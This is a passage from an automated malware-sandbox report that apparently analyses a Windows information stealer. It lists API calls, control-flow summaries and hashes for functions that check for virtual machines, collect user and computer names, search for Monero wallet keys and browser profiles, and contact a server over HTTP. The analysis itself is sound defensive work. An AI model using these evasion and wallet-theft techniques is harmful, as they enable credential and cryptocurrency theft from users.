                        • Opcode Fuzzy Hash: deca31ed00e20fb4dedfd95ba346bfa0db33b0787a1a31aa0ece18af81846ef6
                        • Instruction Fuzzy Hash: AB515CB4A04209EBCB14DFA4E9A4BBF77B5AFC5304F104449E80667390D775E941DBA2

                        Control-flow Graph: function starting at 9a7500 (graph image not preserved; executed/not-executed node listing omitted)
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009A7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A760A
                        • wsprintfA.USER32 ref: 009A7640
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 72776099c6d47c52a4f9737c3a83170e2863724ff2ff5d67988be8b0f238c175
                        • Instruction ID: 695ae3ab2562f6cec5abe8317781562c0fd50ac105435f798400db4e7d4313a6
                        • Opcode Fuzzy Hash: 72776099c6d47c52a4f9737c3a83170e2863724ff2ff5d67988be8b0f238c175
                        • Instruction Fuzzy Hash: 6641B1B1D05248ABDF10DF94DC55BEEBBB8EF49704F100099F50A67280EB78AA44CBE5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0810), ref: 009A98BA
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0738), ref: 009A98D2
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0828), ref: 009A98EA
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B06D8), ref: 009A9903
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B8A70), ref: 009A991B
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A64C0), ref: 009A9933
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A6440), ref: 009A994C
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0630), ref: 009A9964
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B06F0), ref: 009A997C
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0648), ref: 009A9995
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0708), ref: 009A99AD
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A63C0), ref: 009A99C5
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0768), ref: 009A99DE
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009911D0: ExitProcess.KERNEL32 ref: 00991211
                          • Part of subcall function 00991160: GetSystemInfo.KERNEL32(?), ref: 0099116A
                          • Part of subcall function 00991160: ExitProcess.KERNEL32 ref: 0099117E
                          • Part of subcall function 00991110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0099112B
                          • Part of subcall function 00991110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00991132
                          • Part of subcall function 00991110: ExitProcess.KERNEL32 ref: 00991143
                          • Part of subcall function 00991220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0099123E
                          • Part of subcall function 00991220: __aulldiv.LIBCMT ref: 00991258
                          • Part of subcall function 00991220: __aulldiv.LIBCMT ref: 00991266
                          • Part of subcall function 00991220: ExitProcess.KERNEL32 ref: 00991294
                          • Part of subcall function 009A6770: GetUserDefaultLangID.KERNEL32 ref: 009A6774
                          • Part of subcall function 00991190: ExitProcess.KERNEL32 ref: 009911C6
                          • Part of subcall function 009A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                          • Part of subcall function 009A7850: RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                          • Part of subcall function 009A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                          • Part of subcall function 009A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                          • Part of subcall function 009A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                          • Part of subcall function 009A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 009A6AF9
                        • Sleep.KERNEL32(00001770), ref: 009A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6B1A
                        • ExitProcess.KERNEL32 ref: 009A6B22
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 3307ce1b541b4bb0d8e47a62738c280d7949dd1bd453f0eb11590e749dd632b1
                        • Instruction ID: f69c1d1b935debae43ef665d53f63aab636cb182969d396738813bca4d41ab70
                        • Opcode Fuzzy Hash: 3307ce1b541b4bb0d8e47a62738c280d7949dd1bd453f0eb11590e749dd632b1
                        • Instruction Fuzzy Hash: 12314D70904209ABDB44FBF4DC6BBEEB778AFC6300F104519F212A2191EF746905C6E6

                        Control-flow Graph: function starting at 991220 (graph image not preserved; executed/not-executed node listing omitted)
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0099123E
                        • __aulldiv.LIBCMT ref: 00991258
                        • __aulldiv.LIBCMT ref: 00991266
                        • ExitProcess.KERNEL32 ref: 00991294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 987b6a4a8bf12b36a92d5cccd131b09e5bc542b7e5966f751ebeeef6dcc64ca1
                        • Instruction ID: 816874d9eb0bd8df69d3ac84d03134fba764b83a4e9662d2933cebd6eaba0878
                        • Opcode Fuzzy Hash: 987b6a4a8bf12b36a92d5cccd131b09e5bc542b7e5966f751ebeeef6dcc64ca1
                        • Instruction Fuzzy Hash: 3F016DB0E41309BBEF10EBE4CC49B9EBB78BB44701F208049E706B62C0DB7456418B99

                        Control-flow Graph
                        • 9a6af3 -> 9a6b0a
                        • 9a6b0a -> 9a6aba-9a6ad7, 9a6b0c-9a6b22
                        • 9a6aba-9a6ad7: call 9aaad0, OpenEventA -> 9a6ad9-9a6af1, 9a6af5-9a6b04
                        • 9a6ad9-9a6af1: call 9aaad0, CreateEventA -> 9a6b0c-9a6b22
                        • 9a6af5-9a6b04: CloseHandle, Sleep -> 9a6b0a
                        • 9a6b0c-9a6b22: call 9a6920, call 9a5b10, CloseHandle, ExitProcess
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 009A6AF9
                        • Sleep.KERNEL32(00001770), ref: 009A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6B1A
                        • ExitProcess.KERNEL32 ref: 009A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: d73213309a9fd89b11493f13d51f9e9ac432623988cce80b8f91467d797fddd9
                        • Instruction ID: 40cdec42c73069b39e58004702cd5d28f1e71bde0ea8b52753cbf4fb7f4a6c89
                        • Opcode Fuzzy Hash: d73213309a9fd89b11493f13d51f9e9ac432623988cce80b8f91467d797fddd9
                        • Instruction Fuzzy Hash: E4F08230A44209EFE700ABA0DC1ABBEBB74FB46701F144915F513E21C1EFB05940D6E6

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 07b7ec57818962af659bac89d9135a3af55d9c801f272b9fc8076999b4f476e1
                        • Instruction ID: 82f876f513a0b63232672ca6dcacb4886532962c572f799a854978ac0d076bcb
                        • Opcode Fuzzy Hash: 07b7ec57818962af659bac89d9135a3af55d9c801f272b9fc8076999b4f476e1
                        • Instruction Fuzzy Hash: E6213EB1D00209ABDF14DFA5EC45BDDBB75FB45320F108225F915A7290EB706A0ACB91

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 00996280: InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                          • Part of subcall function 00996280: StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                          • Part of subcall function 00996280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                          • Part of subcall function 00996280: HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                          • Part of subcall function 00996280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                          • Part of subcall function 00996280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 02aec151727f0717b79ff18b72d1df55b30a5aac269b64e7f2d07252383d3a01
                        • Instruction ID: 16f0f70ba864c95e4072a643338fdaf8ad6bea0e7d6dfa16e0e278dcfd05560e
                        • Opcode Fuzzy Hash: 02aec151727f0717b79ff18b72d1df55b30a5aac269b64e7f2d07252383d3a01
                        • Instruction Fuzzy Hash: 44113C30900008ABCB54FF68DD92BED7378AF91340F804558F81B4B592EF34AB06CAD2
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0099112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00991132
                        • ExitProcess.KERNEL32 ref: 00991143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 70d0dbb31e6bb83e35bdf463931a4687d2d128b263e373fcb899983962d3d891
                        • Instruction ID: 1550f99736317fe650722de57782946b43b73b2a595b1c21c6c58dd2ffc03f1c
                        • Opcode Fuzzy Hash: 70d0dbb31e6bb83e35bdf463931a4687d2d128b263e373fcb899983962d3d891
                        • Instruction Fuzzy Hash: 7CE0E670946348FFEB106BA59C1EB09B778AB04B01F104155F709771D0DAB52A409699
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009910B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009910F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c99710adb8fe62c90c671d2eaba37eeda75b0d187978dfe5239c82d60170d17a
                        • Instruction ID: 3b6d3a70812d803d1f43f38e410739bb01f98028fbbf016a0a8f9d08ce260070
                        • Opcode Fuzzy Hash: c99710adb8fe62c90c671d2eaba37eeda75b0d187978dfe5239c82d60170d17a
                        • Instruction Fuzzy Hash: D9F0E271641208BBEB149AA8AC59FAFB7ECE705B15F300848F904E3280D9729E00DAA0
                        APIs
                          • Part of subcall function 009A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                          • Part of subcall function 009A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                          • Part of subcall function 009A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                          • Part of subcall function 009A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                          • Part of subcall function 009A7850: RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                          • Part of subcall function 009A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                        • ExitProcess.KERNEL32 ref: 009911C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 42c9b7504b4fcb9b96c66eb75ac40002f265daef786c99b5d2dbc19761e23482
                        • Instruction ID: 1953c7359c4e75a2ceb12dc0846323137979b481800e71ce0d6f3d4eeffb3b71
                        • Opcode Fuzzy Hash: 42c9b7504b4fcb9b96c66eb75ac40002f265daef786c99b5d2dbc19761e23482
                        • Instruction Fuzzy Hash: 42E05BB5E1530263CE1073F8BC5BB2B779CAB55349F040425FA05D3102FE29F80086E6
                        APIs
                        • wsprintfA.USER32 ref: 009A38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A38E3
                        • lstrcat.KERNEL32(?,?), ref: 009A3935
                        • StrCmpCA.SHLWAPI(?,009B0F70), ref: 009A3947
                        • StrCmpCA.SHLWAPI(?,009B0F74), ref: 009A395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A3C67
                        • FindClose.KERNEL32(000000FF), ref: 009A3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 5ccfab3da8a5efad30a247f8446fba0c0f286670eec8195b9d2f40288b40189a
                        • Instruction ID: e3da88a30d1eadc3c550d7de330b18fb66453c149c113b617d8b5271d898950f
                        • Opcode Fuzzy Hash: 5ccfab3da8a5efad30a247f8446fba0c0f286670eec8195b9d2f40288b40189a
                        • Instruction Fuzzy Hash: 97A120B1A012189BDB24DFA4DC95FFEB379BB89300F048589B50D97141EB759B84CFA2
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,009B0B32,009B0B2B,00000000,?,?,?,009B13F4,009B0B2A), ref: 0099BEF5
                        • StrCmpCA.SHLWAPI(?,009B13F8), ref: 0099BF4D
                        • StrCmpCA.SHLWAPI(?,009B13FC), ref: 0099BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0099C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 2d40654a0af87fb8f0fb9a7a414d7f4316a5e32daeb858239af250ff3a68b6e5
                        • Instruction ID: a1407d2b74147b794156eeb246d61d2a0d698881b9cee24cb40f4cdb0c7d9468
                        • Opcode Fuzzy Hash: 2d40654a0af87fb8f0fb9a7a414d7f4316a5e32daeb858239af250ff3a68b6e5
                        • Instruction Fuzzy Hash: 1D425F72900108ABCF54FB64DD96FEE737DABC5300F408558B90A96191EF34AB49CBE2
                        APIs
                        • wsprintfA.USER32 ref: 009A492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                        • StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                        • StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                        • FindClose.KERNEL32(000000FF), ref: 009A4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: d6d8791b199aca9c940b10fd40b9d8e519bdc563a96839996ae66f33c81ddfe4
                        • Instruction ID: f5028afff8e57cffcb615b1940994945a04a064eb43c7acbdad8fb7de535514b
                        • Opcode Fuzzy Hash: d6d8791b199aca9c940b10fd40b9d8e519bdc563a96839996ae66f33c81ddfe4
                        • Instruction Fuzzy Hash: 226141B1900218ABCB20EBA4DC55FEAB37CBBC9700F044589B50996141FF75EB85CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009A4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A4587
                        • wsprintfA.USER32 ref: 009A45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A45BD
                        • StrCmpCA.SHLWAPI(?,009B0FC4), ref: 009A45EB
                        • StrCmpCA.SHLWAPI(?,009B0FC8), ref: 009A4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A468B
                        • FindClose.KERNEL32(000000FF), ref: 009A46A0
                        • lstrcat.KERNEL32(?,015BE390), ref: 009A46C5
                        • lstrcat.KERNEL32(?,015BD398), ref: 009A46D8
                        • lstrlen.KERNEL32(?), ref: 009A46E5
                        • lstrlen.KERNEL32(?), ref: 009A46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 24adf1f3dd9afe00dcbaf31cc34775ece5e3d132e9579b4dd30e1592598c954a
                        • Instruction ID: 6e424e5c9076d7a17280bc95e3a8519f39e796d10e8cbac99bbdb855a5cccb31
                        • Opcode Fuzzy Hash: 24adf1f3dd9afe00dcbaf31cc34775ece5e3d132e9579b4dd30e1592598c954a
                        • Instruction Fuzzy Hash: F65157B19102189BCB24EBB0DC99FEEB37CAB99300F404589F60997150EF759B84CF92
                        APIs
                        • wsprintfA.USER32 ref: 009A3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A3EDA
                        • StrCmpCA.SHLWAPI(?,009B0FAC), ref: 009A3F08
                        • StrCmpCA.SHLWAPI(?,009B0FB0), ref: 009A3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A406C
                        • FindClose.KERNEL32(000000FF), ref: 009A4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 704e02576ad8c0cb9c4873fd505e767d1dfc5d3e1470f16b685a0d55d719b957
                        • Instruction ID: 40b4ded616546e49659311e3337ed20c298f177b127b32cd63bb83651bb0a251
                        • Opcode Fuzzy Hash: 704e02576ad8c0cb9c4873fd505e767d1dfc5d3e1470f16b685a0d55d719b957
                        • Instruction Fuzzy Hash: E05134B2900218ABCB24EBB4DC95FEAB37CBB85300F404589B65996150EF75EB858F91
                        APIs
                        • wsprintfA.USER32 ref: 0099ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0099ED55
                        • StrCmpCA.SHLWAPI(?,009B1538), ref: 0099EDAB
                        • StrCmpCA.SHLWAPI(?,009B153C), ref: 0099EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0099F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
